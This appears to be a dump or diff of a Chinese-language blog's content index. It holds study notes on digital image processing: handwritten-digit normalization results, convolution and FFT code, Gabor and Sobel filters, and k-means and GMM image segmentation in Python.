    To modify the feature distribution for better classification performance, the variable transformation $y=x^p$ is applied to all measurements of the feature vector. This is also known as the Box-Cox transformation. For computational convenience, the power parameter is not optimized in our experiments but is fixed at $p=0.5$.
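
    For instance, a trivial sketch of the fixed-power transformation on a toy feature vector:

    import numpy as np

    features = np.array([0.00, 0.04, 0.25, 1.00])
    print(features ** 0.5)    # [0.  0.2 0.5 1. ] -- small values are spread out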

    4 Experimental results

    4.1 Results on CENPARMI database

    The handwritten digit database of CENPARMI (Concordia University, Canada) contains 6000 digit images (600 images for each of the 10 classes), collected from live mail of the US Postal Service and scanned at 166 DPI.
    In the database, 4000 images are designated for training and the remaining 2000 images for testing.


    Two classifiers are used:

    • polynomial classifier (PC)
    • support vector classifier with radial basis function kernel (SVC-rbf)

    $$RPM=\frac{100\,AER}{\min(AER)}$$

    where $AER$ denotes the average error rate.

    The inverse of $RPM$ corresponds to the ratio of error rate between the best method and an alternative method.

    • When the ratio of error rate is $\ge0.9$ (corresponding to $RPM\le111.1$), the alternative method is considered competitive with the best one.
    • When the ratio of error rate is $\ge0.8$ (corresponding to $RPM\le125$), the alternative method is considered good.
    • When $0.7\le$ ratio of error rate $<0.8$ ($125<RPM\le142.9$), the alternative method is considered fair.
    • A ratio of error rate $<0.7$ ($RPM>142.9$) indicates that the alternative method performs poorly.
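
    A minimal sketch of the measure, assuming a list of average error rates for the compared methods:

    import numpy as np

    def rpm(aer):
        # Relative performance: 100 * AER / min(AER); the best method gets 100
        aer = np.asarray(aer, dtype=float)
        return 100.0 * aer / aer.min()

    print(rpm([1.20, 1.08, 1.35]))   # [111.11... 100. 125.]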

    $F0$, $F2$, $F4$ and $F9$ perform best, while the aspect-ratio-preserving $F1$ and $F7$ perform worse.

    4.2 Results on NIST database

    We built an experimental database from the CD of NIST Special Database 19 (SD19). The training set consists of the digit samples of 600 writers (no. 0–399 and no. 2100–2299), and the test set of the digit samples of 400 writers (no. 500–699 and no. 2400–2599). The total numbers of samples in the training and test sets are 66,274 and 45,398, respectively. The images were scanned at 300 DPI.
    The character images of the NIST database contain considerable contour noise, so smoothing is necessary for NCFE.
    For recognition on the NIST database, two classifiers are used:

    • polynomial classifier (PC)

    • discriminative learning quadratic discriminant function (DLQDF)


    • Among the feature vectors, des and grd-g perform best.
    • ncf-p and ncf-c show a clear advantage over ncf.

    4.3 Results on Hitachi database

    To test the recognition performance on Japanese writing styles, a database collected by Hitachi is used. The samples were collected from images of sample sheets and real forms (insurance applications, bank transactions, etc.), scanned at 200 DPI. The training set contains 164,158 samples, which we use to train a PC with 80 principal components.


    • $F0$, $F2$, $F3$, $F4$, $F5$ and $F9$ perform best, while the aspect-ratio-preserving $F1$ and $F7$ perform worse.
    • des performs poorly, probably because digit images in the Japanese writing style are not strongly slanted.

    4.4 Speed of feature extraction

    $8$-direction features take more time to extract than $4$-direction features.

    $F6$ (nonlinear normalization) takes more time than the other normalization functions.

    5 Conclusion

    We compared the performance of ten normalization functions and eight feature vectors for handwritten digit recognition on large databases from different sources. The normalization functions implement dimension-based linear/nonlinear normalization and moment-based normalization with varying aspect ratio mapping. The recognition results show that the moment normalization functions F8 and F9 give the highest classification accuracies. Aspect ratio mapping influences the recognition performance of both dimension-based and moment-based normalization.

    Takeaways

    This is a paper on character recognition, focused on the normalization and feature extraction of character image data. I tried to reproduce parts of the paper in code; while reading the paper and reproducing it, I learned a lot about digital image processing and picked up some new concepts, such as chaincodes, the image centroid, and image moments. Feature engineering of this kind helps improve accuracy in machine learning.

    ]]>
    @@ -8901,7 +8901,7 @@ /posts/DIP-Convolutions%20in%20image%20processing/ - References

    Main text

    The convolution operation

    • Continuous convolution:

    $$(f*g)(t):=\int_{-\infty}^{+\infty} f(x)\cdot g(t-x)dx$$

    gif

    • Discrete convolution:

    $$(f*g)[n]=\sum_{m=-M}^{M} f[n-m]g[m]$$

    Multiply point by point, then sum.

    jpg

    This gives each output value some of the characteristics of the neighboring data:

    jpg

    Applications in digital image processing

    import cv2
    import matplotlib.pyplot as plt
    import numpy as np

    img = cv2.imread('images/tom_in_bowtie.jpg')
    plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2a11b90d760>

    png

    img.shape
    (500, 399, 3)
    def plot(array):
        print(array)
        plt.matshow(array, cmap='Wistia')
        plt.colorbar()
        for x in range(len(array)):
            for y in range(len(array)):
                plt.annotate(round(array[x, y], 3), xy=(x, y),
                             horizontalalignment='center',
                             verticalalignment='center')
        return plt

    Mean filtering

    jpg

    kernel = np.ones((3, 3)) / 9
    plot(kernel)
    [[0.11111111 0.11111111 0.11111111]
     [0.11111111 0.11111111 0.11111111]
     [0.11111111 0.11111111 0.11111111]]
    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x2a11c0d0af0>

    png

    Gaussian blur

    jpg

    Define the Gaussian kernel, with $\sigma$ the standard deviation:

    $$G(x,y)=\frac{1}{2\pi\sigma^2}\exp\left(-\frac{x^2+y^2}{2\sigma^2}\right)$$

    $$G(x,y)=\frac{1}{2\pi\sigma_x\sigma_y}\exp\left[-\left(\frac{x^2}{2\sigma_x^2}+\frac{y^2}{2\sigma_y^2}\right)\right]=\frac{1}{\sqrt{2\pi}\sigma_x}\exp\left(-\frac{x^2}{2\sigma_x^2}\right)\cdot \frac{1}{\sqrt{2\pi}\sigma_y}\exp\left(-\frac{y^2}{2\sigma_y^2}\right)=G(x)\cdot G(y)$$

    def gaussian_kernel_2d(ksize, sigma):
        # Outer product of two 1-D Gaussian kernels, using the separability above
        return cv2.getGaussianKernel(ksize, sigma) @ cv2.getGaussianKernel(ksize, sigma).T
    kernel = gaussian_kernel_2d(7, -1)
    plot(kernel)
    [[0.00097656 0.00341797 0.00683594 0.00878906 0.00683594 0.00341797 0.00097656]
     [0.00341797 0.01196289 0.02392578 0.03076172 0.02392578 0.01196289 0.00341797]
     [0.00683594 0.02392578 0.04785156 0.06152344 0.04785156 0.02392578 0.00683594]
     [0.00878906 0.03076172 0.06152344 0.07910156 0.06152344 0.03076172 0.00878906]
     [0.00683594 0.02392578 0.04785156 0.06152344 0.04785156 0.02392578 0.00683594]
     [0.00341797 0.01196289 0.02392578 0.03076172 0.02392578 0.01196289 0.00341797]
     [0.00097656 0.00341797 0.00683594 0.00878906 0.00683594 0.00341797 0.00097656]]
    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    sum(sum(kernel))
    1.0

    Apply the Gaussian filter

    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2abcbef70>

    png

    Equivalent to

    fimg = cv2.GaussianBlur(img, (7, 7), -1)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2aa6a6910>

    png

    Sharpening

    kernel = np.array([[-0.5, -1.0, -0.5],
    [-1.0, 7.0, -1.0],
    [-0.5, -1.0, -0.5]])
    plot(kernel)
    [[-0.5 -1.  -0.5]
     [-1.   7.  -1. ]
     [-0.5 -1.  -0.5]]
    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    png

    sum(sum(kernel))
    1.0
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB))
    <matplotlib.image.AxesImage at 0x1c2a9376fd0>

    png

    Edge detection

    jpg

    # Not sure why the middle entries here all print as 0.0...
    kernel = np.array([[-0.125, 0.0, 0.125],
    [-0.25, 0.0, 0.25],
    [-0.125, 0.0, 0.125]])
    plot(kernel)
    [[-0.125  0.     0.125]
     [-0.25   0.     0.25 ]
     [-0.125  0.     0.125]]
    <module 'matplotlib.pyplot' from 'C:\\Users\\gzjzx\\anaconda3\\lib\\site-packages\\matplotlib\\pyplot.py'>

    jpg

    sum(sum(kernel))
    0.0
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(4 * cv2.cvtColor(fimg, cv2.COLOR_BGR2RGB)) # 太黑了,我乘个 4
    <matplotlib.image.AxesImage at 0x2a11c124520>

    png

    Convolution via Fourier transform is faster

    In other words, direct convolution uses many multiplications: convolving two length-$n$ sequences by definition costs $O(n^2)$, while FFT-based convolution costs $O(n\log n)$, which is why the FFT approach is faster.

    import numpy as np

    arr1 = np.random.random(100000)
    arr2 = np.random.random(100000)
    %%timeit
    np.convolve(arr1, arr2)
    1.66s ± 341ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
    import scipy.signal
    %%timeit
    scipy.signal.fftconvolve(arr1, arr2)
    10.8ms ± 1.24ms per loop (mean ± std. dev. of 7 runs, 100 loops each)

    By definition

    def conv(a, b):
        N = len(a)
        M = len(b)
        YN = N + M - 1
        y = [0.0 for i in range(YN)]
        for n in range(YN):
            for m in range(M):
                if 0 <= n - m < N:
                    y[n] += a[n - m] * b[m]
        return y
    conv((1, 2, 3), (4, 5, 6))
    [4.0, 13.0, 28.0, 27.0, 18.0]

    Using the numpy library

    import numpy as np

    np.convolve((1, 2, 3), (4, 5, 6))
    array([ 4, 13, 28, 27, 18])

    Fast convolution via FFT

    def convfft(a, b):
        N = len(a)
        M = len(b)
        YN = N + M - 1
        FFT_N = 2 ** (int(np.log2(YN)) + 1)   # next power of two >= YN
        afft = np.fft.fft(a, FFT_N)
        bfft = np.fft.fft(b, FFT_N)
        abfft = afft * bfft                   # convolution theorem
        y = np.fft.ifft(abfft).real[:YN]
        return y
    convfft((1, 2, 3), (4, 5, 6))
    array([ 4., 13., 28., 27., 18.])

    Comparison

    import time
    import matplotlib.pyplot as plt

    def run(func, a, b):
        n = 1
        start = time.perf_counter()
        for j in range(n):
            func(a, b)
        end = time.perf_counter()
        run_time = end - start
        return run_time / n

    n_list = []
    t1_list = []
    t2_list = []
    for i in range(10):
        count = i * 1000 + 10
        print(count)
        a = np.ones(count)
        b = np.ones(count)
        t1 = run(conv, a, b)      # direct convolution
        t2 = run(convfft, a, b)   # FFT convolution
        n_list.append(count)
        t1_list.append(t1)
        t2_list.append(t2)

    # plot
    plt.plot(n_list, t1_list, label='conv')
    plt.plot(n_list, t2_list, label='convfft')
    plt.legend()
    plt.title(u"convolve times")
    plt.ylabel(u"run times(ms/point)")
    plt.xlabel(u"length")
    plt.show()
    10
    1010
    2010
    3010
    4010
    5010
    6010
    7010
    8010
    9010

    png

    ]]>
    @@ -8928,7 +8928,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(55-58)-Supervised%20Learning/ - Main text

    55 - How to read proprietary microscope images into Python

    (Aimed at microscope users; skipped.)

    56 - What are features in machine learning

    (Couldn't follow this one; skipped.)

    png

    57 - How to generate features in Python for machine learning

    import matplotlib.pyplot as plt
    import cv2

    img = cv2.imread('images/scratch.jpg', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x181098b9220>

    png

    • This image is hard to segment with the traditional histogram-based approach.

    • Segment it with an entropy filter instead: the whiter a pixel, the higher the entropy.

    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(1))
    plt.imshow(entropy_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x1810981b2e0>

    png


    • But on the image below, the entropy filter does not work well:
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    img = cv2.imread('images/Yeast_Cells.png', 0)
    entropy_img = entropy(img, disk(1))

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(121)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('img')

    ax2 = fig.add_subplot(122)
    ax2.imshow(entropy_img, cmap='gray')
    ax2.title.set_text('entropy_img')
    plt.show()

    png


    • Using the Sobel filter
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    img = cv2.imread('images/Yeast_Cells.png', 0)
    entropy_img = entropy(img, disk(1))

    from scipy import ndimage as nd

    gaussian_img = nd.gaussian_filter(img, sigma=3)

    from skimage.filters import sobel

    sobel_img = sobel(img)

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('img')

    ax2 = fig.add_subplot(132)
    ax2.imshow(gaussian_img, cmap='gray')
    ax2.title.set_text('gaussian_img')

    ax3 = fig.add_subplot(133)
    ax3.imshow(sobel_img, cmap='gray')
    ax3.title.set_text('sobel_img')

    plt.show()

    png


    • Collecting the statistics with Pandas for machine learning
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk
    from scipy import ndimage as nd
    from skimage.filters import sobel
    import pandas as pd

    img = cv2.imread('images/Yeast_Cells.png', 0)
    img2 = img.reshape(-1)

    df = pd.DataFrame()
    df['Original Pixel Values'] = img2

    entropy_img = entropy(img, disk(1))
    entropy1 = entropy_img.reshape(-1)
    df['Entropy'] = entropy1

    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian1 = gaussian_img.reshape(-1)
    df['Gaussian'] = gaussian1

    sobel_img = sobel(img)
    sobel1 = sobel_img.reshape(-1)
    df['Sobel'] = sobel1

    df
    Original Pixel Values Entropy Gaussian Sobel
    0 123 1.584963 116 0.027311
    1 122 1.500000 113 0.025565
    2 116 2.000000 109 0.032590
    3 114 2.000000 103 0.063612
    4 99 2.000000 97 0.098479
    ... ... ... ... ...
    1048571 111 2.000000 107 0.022570
    1048572 118 2.000000 107 0.007466
    1048573 106 2.000000 108 0.021702
    1048574 109 1.500000 108 0.012783
    1048575 112 1.584963 108 0.005280

    1048576 rows × 4 columns

    58 - What are Gabor filters

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x'^2+\gamma^2y'^2}{2\sigma^2}\right)\cdot\exp\left[i\left(2\pi\frac{x'}{\lambda}+\psi\right)\right]$$

    • By Euler's formula:

    $$e^{ix}=\cos x + i \sin x$$

    • Real part:

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x'^2+\gamma^2y'^2}{2\sigma^2}\right)\cdot\cos\left(2\pi\frac{x'}{\lambda}+\psi\right)$$

    • Imaginary part:

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x'^2+\gamma^2y'^2}{2\sigma^2}\right)\cdot\sin\left(2\pi\frac{x'}{\lambda}+\psi\right)$$

    where $x'=x\cos\theta + y\sin \theta$ and $y'=-x\sin\theta + y\cos \theta$.

    • $\lambda$ represents the wavelength of the sinusoidal factor.

    • $\theta$ represents the orientation of the normal to the parallel stripes of the Gabor function.

    • $\psi$ is the phase offset.

    • $\sigma$ is the standard deviation of the Gaussian envelope.

    • $\gamma$ is the spatial aspect ratio, and specifies the ellipticity of the support of the Gabor function. The closer to 1, the more circular; the closer to 0, the more elongated.
    # kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    import numpy as np
    import cv2
    import matplotlib.pyplot as plt

    ksize = 5
    sigma = 3
    theta = 1 * np.pi / 4
    lamda = 1 * np.pi / 4
    gamma = 0.5
    phi = 0

    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    plt.imshow(kernel, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c8e8d90>

    png

    img = cv2.imread('images/synthetic.jpg', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c966fd0>

    png

    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(fimg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c9bec40>

    png


    By changing the value of $\theta$, the Gabor filter can be made to respond to the down-right diagonal lines instead.

    import numpy as np
    import cv2
    import matplotlib.pyplot as plt

    ksize = 5
    sigma = 3
    theta = 3 * np.pi / 4
    lamda = 1 * np.pi / 4
    gamma = 0.5
    phi = 0

    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(fimg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c697b20>

    png

    ]]>
    + 正文

    55 - How to read proprietary microscope images into Python

    (给使用显微镜的人看的,略)

    56 - What are features in machine learning

    (听不懂,寄)

    png

    57 - How to generate features in Python for machine learning

    1
    2
    3
    4
    5
    import matplotlib.pyplot as plt
    import cv2

    img = cv2.imread('images/scratch.jpg', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x181098b9220>

    png

    • 这个图像很难使用传统的直方图方法来分割

    • 使用熵过滤器来分割,像素点越白,表示熵越高

    1
    2
    3
    4
    5
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(1))
    plt.imshow(entropy_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x1810981b2e0>

    png


    • 但在如下图像中,熵过滤器的效果并不好
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    img = cv2.imread('images/Yeast_Cells.png', 0)
    entropy_img = entropy(img, disk(1))

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(121)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('img')

    ax2 = fig.add_subplot(122)
    ax2.imshow(entropy_img, cmap='gray')
    ax2.title.set_text('entropy_img')
    plt.show()

    png


    • 使用 Sobel 过滤器
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    img = cv2.imread('images/Yeast_Cells.png', 0)
    entropy_img = entropy(img, disk(1))

    from scipy import ndimage as nd

    gaussian_img = nd.gaussian_filter(img, sigma=3)

    from skimage.filters import sobel

    sobel_img = sobel(img)

    fig = plt.figure(figsize=(10, 10))

    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('img')

    ax2 = fig.add_subplot(132)
    ax2.imshow(gaussian_img, cmap='gray')
    ax2.title.set_text('gaussian_img')

    ax3 = fig.add_subplot(133)
    ax3.imshow(sobel_img, cmap='gray')
    ax3.title.set_text('sobel_img')

    plt.show()

    png


    • 使用 Pandas 统计数据用于机器学习
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    import matplotlib.pyplot as plt
    import cv2
    from skimage.filters.rank import entropy
    from skimage.morphology import disk
    from scipy import ndimage as nd
    from skimage.filters import sobel
    import pandas as pd

    img = cv2.imread('images/Yeast_Cells.png', 0)
    img2 = img.reshape(-1)

    df = pd.DataFrame()
    df['Original Pixel Values'] = img2

    entropy_img = entropy(img, disk(1))
    entropy1 = entropy_img.reshape(-1)
    df['Entropy'] = entropy1

    gaussian_img = nd.gaussian_filter(img, sigma=3)
    gaussian1 = gaussian_img.reshape(-1)
    df['Gaussian'] = gaussian1

    sobel_img = sobel(img)
    sobel1 = sobel_img.reshape(-1)
    df['Sobel'] = sobel1

    df
    Original Pixel Values Entropy Gaussian Sobel
    0 123 1.584963 116 0.027311
    1 122 1.500000 113 0.025565
    2 116 2.000000 109 0.032590
    3 114 2.000000 103 0.063612
    4 99 2.000000 97 0.098479
    ... ... ... ... ...
    1048571 111 2.000000 107 0.022570
    1048572 118 2.000000 107 0.007466
    1048573 106 2.000000 108 0.021702
    1048574 109 1.500000 108 0.012783
    1048575 112 1.584963 108 0.005280

    1048576 rows × 4 columns

    58 - What are Gabor filters

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cdot\exp\left[i\left(2\pi\frac{x’}{\lambda}+\psi\right)\right]$$

    • 根据欧拉公式:

    $$e^{ix}=\cos x + i \sin x$$

    • 实数部分:

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cdot\cos\left(2\pi\frac{x’}{\lambda}+\psi\right)$$

    • 虚数部分:

    $$g(x,y;\lambda,\theta,\psi,\sigma,\gamma)=\exp \left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cdot\sin\left(2\pi\frac{x’}{\lambda}+\psi\right)$$

    其中 $x’=x\cos\theta + y\sin \theta$, $y’=-x\sin\theta + y\cos \theta$

• $\lambda$ represents the wavelength of the sinusoidal factor.

• $\theta$ represents the orientation of the normal to the parallel stripes of the Gabor function.

• $\psi$ is the phase offset.

• $\sigma$ is the standard deviation of the Gaussian envelope.

• $\gamma$ is the spatial aspect ratio, and specifies the ellipticity of the support of the Gabor function: the closer it is to 1, the more circular the support; the closer to 0, the more elongated the ellipse.
    # kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    import numpy as np
    import cv2
    import matplotlib.pyplot as plt

    ksize = 5
    sigma = 3
    theta = 1 * np.pi / 4
    lamda = 1 * np.pi / 4
    gamma = 0.5
    phi = 0

    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    plt.imshow(kernel, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c8e8d90>

    png

    img = cv2.imread('images/synthetic.jpg', 0)
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c966fd0>

    png

    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(fimg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c9bec40>

    png


By changing the value of $\theta$, the Gabor filter can be made to pick out the diagonal lines running toward the lower right (a small filter-bank sketch follows this example).

    import numpy as np
    import cv2
    import matplotlib.pyplot as plt

    ksize = 5
    sigma = 3
    theta = 3 * np.pi / 4
    lamda = 1 * np.pi / 4
    gamma = 0.5
    phi = 0

    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(fimg, cmap='gray')
    <matplotlib.image.AxesImage at 0x2021c697b20>

    png
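Going one step further — this is my own extension, not part of the tutorial — the same call can be swept over $\theta$ to build a small Gabor filter bank, one kernel per edge orientation:

import numpy as np
import cv2

ksize, sigma, lamda, gamma, phi = 5, 3, np.pi / 4, 0.5, 0

bank = []
for theta in np.arange(0, np.pi, np.pi / 4):  # 0, 45, 90 and 135 degrees
    kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, phi, ktype=cv2.CV_32F)
    bank.append(kernel)

# one filtered response per orientation, reusing img loaded above
responses = [cv2.filter2D(img, cv2.CV_8UC3, k) for k in bank]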

    ]]>
    @@ -8955,7 +8955,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(50-54)-Unsupervised%20Learning/ - 正文

    50 - What is k-means clustering and how to code it in Python

    import pandas as pd

    df = pd.read_excel('data/K_Means.xlsx')
    df.head()
    X Y
    0 1 42
    1 2 46
    2 3 51
    3 4 20
    4 5 30
    import seaborn as sns
    sns.regplot(x=df['X'], y=df['Y'], fit_reg=False)
    <AxesSubplot:xlabel='X', ylabel='Y'>

    png
We know that the choice of initial centers has a large effect on the result, so improving the initialization is an important topic. Among the improved algorithms, K-means++ is the best known.

The K-means++ algorithm proceeds as follows:

1. Pick one center $a_1$ at random;
2. For every point, compute the distance $D(x)$ to the nearest center chosen so far, and pick a new center $a_i$ with probability $\frac{D(x)^2}{\Sigma D(x)^2}$;
3. Repeat step 2 until $k$ centers have been chosen.

Simply put, K-means++ tends to pick points that are far from the centers already chosen, which matches intuition: cluster centers are best placed far apart from one another. (A small sketch of this seeding step appears after the next code block.)

The drawback of this algorithm is that it is hard to parallelize. k-means|| therefore changes the sampling strategy: instead of sampling a single point per pass as k-means++ does, it samples $k$ points per pass and repeats the sampling about $\log(n)$ times, yielding a set of roughly $k\log(n)$ candidate points, from which the final $k$ centers are chosen. In practice even $\log(n)$ passes are rarely needed; about 5 are enough.

    from sklearn.cluster import KMeans

    kmeans = KMeans(n_clusters=3, init='k-means++', max_iter=300, n_init=10, random_state=0)
    model = kmeans.fit(df)
    predicted_values = kmeans.predict(df)
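For intuition, here is what init='k-means++' does internally — a minimal NumPy sketch of the seeding step (my own illustration; sklearn's implementation adds further refinements):

import numpy as np

def kmeanspp_init(X, k, rng=np.random.default_rng(0)):
    centers = [X[rng.integers(len(X))]]  # step 1: first center at random
    for _ in range(k - 1):
        # squared distance of every point to its nearest chosen center
        d2 = np.min(((X[:, None, :] - np.array(centers)[None, :, :]) ** 2).sum(-1), axis=1)
        centers.append(X[rng.choice(len(X), p=d2 / d2.sum())])  # step 2: far points more likely
    return np.array(centers)

init_centers = kmeanspp_init(df.to_numpy(float), 3)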
    from matplotlib import pyplot as plt

    plt.scatter(df['X'], df['Y'], c=predicted_values, s=50, cmap='viridis')
    plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s=200, c='black', alpha=0.5)
    <matplotlib.collections.PathCollection at 0x2e8afc39d00>

    png

    51 - Image Segmentation using K-means

    import numpy as np
    import matplotlib.pyplot as plt
    import cv2

    img = cv2.imread('images/BSE_Image.jpg')
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x202a78459d0>

    png

• Flatten the image into a one-dimensional array of pixels
    img2 = img.reshape((-1, 3))
    img2 = np.float32(img2)
• Now we apply the kmeans function. Before that we need to specify the criteria: my criteria is such that whenever 10 iterations of the algorithm have run, or an accuracy of epsilon = 1.0 is reached, the algorithm stops and returns the answer.
• criteria : the iteration termination criteria. When this criteria is satisfied, the algorithm iteration stops. It is a tuple of 3 parameters, ( type, max_iter, epsilon ):

  • type of termination criteria. It has 3 flags, as below:

    • cv.TERM_CRITERIA_EPS - stop the algorithm iteration if the specified accuracy, epsilon, is reached.
    • cv.TERM_CRITERIA_MAX_ITER - stop the algorithm after the specified number of iterations, max_iter.
    • cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER - stop the iteration when either of the above conditions is met.
  • max_iter - an integer specifying the maximum number of iterations.

  • epsilon - the required accuracy.
    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
• Clusters : the number of clusters (k) to split the data into.

• attempts : the number of times the algorithm is executed using different initial labellings. The algorithm returns the labels that yield the best compactness, and this compactness is returned as output.

• flags : specifies how the initial centers are taken. Normally two flags are used for this: cv.KMEANS_PP_CENTERS and cv.KMEANS_RANDOM_CENTERS.

• compactness : the sum of squared distances from each point to its corresponding center.

• labels : the label array (same as 'code' in the previous article) where each element is marked '0', '1', …

• centers : the array of cluster centers.
    k = 3
    attempts = 10
    ret, label, center = cv2.kmeans(img2, k, None, criteria, attempts, cv2.KMEANS_PP_CENTERS)
    center = np.uint8(center)
    res = center[label.flatten()]
• Reshape the array back to the original image shape
    res2 = res.reshape((img.shape))
• The image has finally been reduced to just 3 colors.

• Color Quantization is the process of reducing the number of colors in an image. One reason to do so is to reduce memory. Some devices may have limitations such that they can only produce a limited number of colors; in those cases color quantization is performed as well. Here we use k-means clustering for color quantization.

• There is nothing new to explain here. There are 3 features, say R, G, B, so we need to reshape the image to an Mx3 array (M is the number of pixels in the image). After the clustering we apply the centroid values (also R, G, B) to all pixels, so that the resulting image has the specified number of colors, and then we reshape it back to the shape of the original image.
    center
array([[251, 251, 251],
       [151, 151, 151],
       [ 47,  47,  47]], dtype=uint8)
    plt.imshow(res2)
    <matplotlib.image.AxesImage at 0x202a83ac2b0>

    png

    52 - What is GMM and how to use it for Image segmentation

    import numpy as np
    import cv2

    img = cv2.imread('images/plant_cells.jpg')
    img2 = img.reshape((-1, 3))
    from sklearn.mixture import GaussianMixture as GMM

    gmm_model = GMM(n_components=2, covariance_type='tied').fit(img2)
    gmm_labels = gmm_model.predict(img2)
    original_shape = img.shape
    segmented = gmm_labels.reshape(original_shape[0], original_shape[1])
• The image is segmented into two classes, 0 and 1
    import matplotlib.pyplot as plt

    plt.imshow(segmented, cmap='gray')
    <matplotlib.image.AxesImage at 0x1ee043bb4c0>

    png


    import numpy as np
    import cv2

    img = cv2.imread('images/BSE_Image.jpg')
    img2 = img.reshape((-1, 3))

    from sklearn.mixture import GaussianMixture as GMM

# split into 4 classes
    gmm_model = GMM(n_components=4, covariance_type='tied').fit(img2)
    gmm_labels = gmm_model.predict(img2)
    original_shape = img.shape
    segmented = gmm_labels.reshape(original_shape[0], original_shape[1])

    import matplotlib.pyplot as plt

    plt.imshow(segmented, cmap='gray')
    <matplotlib.image.AxesImage at 0x1ee04598c10>

    png

    52b - Understanding Gaussian Mixture Model -GMM- using 1D- 2D- and 3D examples

    • Demonstration of GMM on 1D, 2D, and 3D data.

    For 1D

• First we generate data by sampling random data from two normal distributions.

